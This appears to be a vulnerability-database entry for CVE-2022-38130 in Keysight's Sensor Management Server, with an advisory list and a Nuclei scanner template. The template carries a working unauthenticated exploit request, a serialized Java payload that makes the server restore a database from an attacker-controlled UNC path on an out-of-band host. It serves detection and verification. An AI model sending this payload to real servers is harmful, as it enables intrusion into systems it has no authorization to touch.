| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
| CVE-2022-38130 | 10 Aug 202220:16 | – | attackerkb | |
| CVE-2022-38130 | 11 Aug 202200:26 | – | circl | |
| Keysight Technologies Sensor Management Server SQL注入漏洞 | 10 Aug 202200:00 | – | cnnvd | |
| CVE-2022-38130 | 10 Aug 202216:05 | – | cve | |
| CVE-2022-38130 | 10 Aug 202216:05 | – | cvelist | |
| EUVD-2022-40732 | 3 Oct 202520:07 | – | euvd | |
| CVE-2022-38130 | 10 Aug 202220:16 | – | nvd | |
| Design/Logic Flaw | 10 Aug 202220:16 | – | prion | |
| PT-2022-24224 | 10 Aug 202200:00 | – | ptsecurity | |
| CVE-2022-38130 | 9 Jan 202610:57 | – | redhatcve |
| Source | Link |
|---|---|
| tenable | www.tenable.com/security/research/tra-2022-28 |
| sonicwall | www.sonicwall.com/blog/keysight-rf-sensor-vulnerability |
id: CVE-2022-38130
info:
name: KeySight RF - smsRestoreDatabaseZip UNC path to Remote Code Execution
author: daffainfo,jjcho
severity: critical
description: |
The com.keysight.tentacle.config.ResourceManager.smsRestoreDatabaseZip() method is used to restore the HSQLDB database used in SMS. It takes the path of the zipped database file as the single parameter. An unauthenticated, remote attacker can specify an UNC path for the database file (i.e., \\<attacker-host>\sms\<attacker-db.zip>), effectively controlling the content of the database to be restored.
impact: |
Unauthenticated attackers can control database content, potentially leading to data tampering or execution of malicious code.
remediation: |
Implement validation and sanitization of the database file path parameter to restrict to trusted locations.
reference:
- https://www.tenable.com/security/research/tra-2022-28
- https://www.sonicwall.com/blog/keysight-rf-sensor-vulnerability
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-38130
epss-score: 0.53389
epss-percentile: 0.98858
cwe-id: CWE-89
cpe: cpe:2.3:a:keysight:sensor_management_server:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: keysight
product: sensor_management_server
tags: cve,cve2022,keysight,sensor_management_server,rce,vkev,oast,oob
variables:
cmd: '\\\\{{interactsh-url}}\\test'
serialized_str: '{{concat(hex_decode("aced0005737200356f72672e737072696e676672616d65776f726b2e72656d6f74696e672e737570706f72742e52656d6f7465496e766f636174696f6e5f6c8b9ff60a110a0200045b0009617267756d656e74737400135b4c6a6176612f6c616e672f4f626a6563743b4c000a6174747269627574657374000f4c6a6176612f7574696c2f4d61703b4c000a6d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000e706172616d6574657254797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c0200007870000000017400"), hex_decode(dec_to_hex(len(cmd))), cmd, hex_decode("70740015736d73526573746f726544617461626173655a6970757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a99020000787000000001767200106a6176612e6c616e672e537472696e67a0f0a4387a3bb3420200007870"))}}'
http:
- raw:
- |
POST /server/service/smsConfigServiceHttpInvoker HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-java-serialized-object
{{serialized_str}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- "contains(interactsh_protocol, 'dns')"
- "contains(content_type, 'application/x-java-serialized-object')"
- "contains_all(body, 'org.springframework','RemoteInvocationResult')"
condition: and
# digest: 4a0a00473045022100e24f3443ea99280765a651ddaff7ab9baa162d2328cc41313fbaa763ff61b090022042b3b278375a6575093e3ea76f1259d099bbbcf877dc6288831d909ee23e83a2:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation